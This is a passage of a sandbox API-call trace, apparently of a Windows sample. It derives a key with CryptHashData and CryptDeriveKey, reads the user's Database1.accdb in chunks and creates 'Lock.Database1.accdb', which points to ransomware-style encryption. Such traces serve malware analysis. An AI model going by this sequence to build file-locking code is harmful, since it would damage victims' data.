lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.458] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.458] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0215.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabd28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0215.464] CryptHashData (hHash=0x9e2138, pbData=0x2a726a8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0215.464] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.464] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.464] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.464] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabad0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0215.464] CryptDeriveKey (in: hProv=0xa7c660, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0215.464] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.464] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0215.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0215.465] CryptDestroyHash (hHash=0x9e2138) returned 1 [0215.465] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0215.466] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.466] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0215.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0215.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0215.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0215.467] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38548a8 [0215.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.467] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0215.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38548a8 | out: hHeap=0x2af0000) returned 1 [0215.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0215.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0215.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.468] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\lock.database1.accdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0215.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0215.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.469] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0215.470] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0215.470] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0215.470] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0215.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0215.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0215.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e2020 [0215.474] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0215.474] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0215.478] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0215.488] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0215.490] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0215.492] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0215.493] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x5000, lpOverlapped=0x0) returned 1 [0215.494] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0215.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x55000) returned 0x37c0048 [0215.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e2020 | out: hHeap=0x2af0000) returned 1 [0215.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x55000) returned 0x3867020 [0215.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0215.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0215.517] TranslateMessage (lpMsg=0x8cf708) returned 0 [0215.517] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0215.517] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0215.517] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x55000) returned 0x37c0048 [0215.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0215.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.518] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0215.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0215.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0215.518] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0215.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0215.518] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0215.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0215.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x55000) returned 0x37c0048 [0215.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0215.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0215.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaea0 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0215.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0215.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0215.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0215.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x55000) returned 0x38bc028 [0215.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0215.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0215.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0215.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.526] RtlAllocateHeap 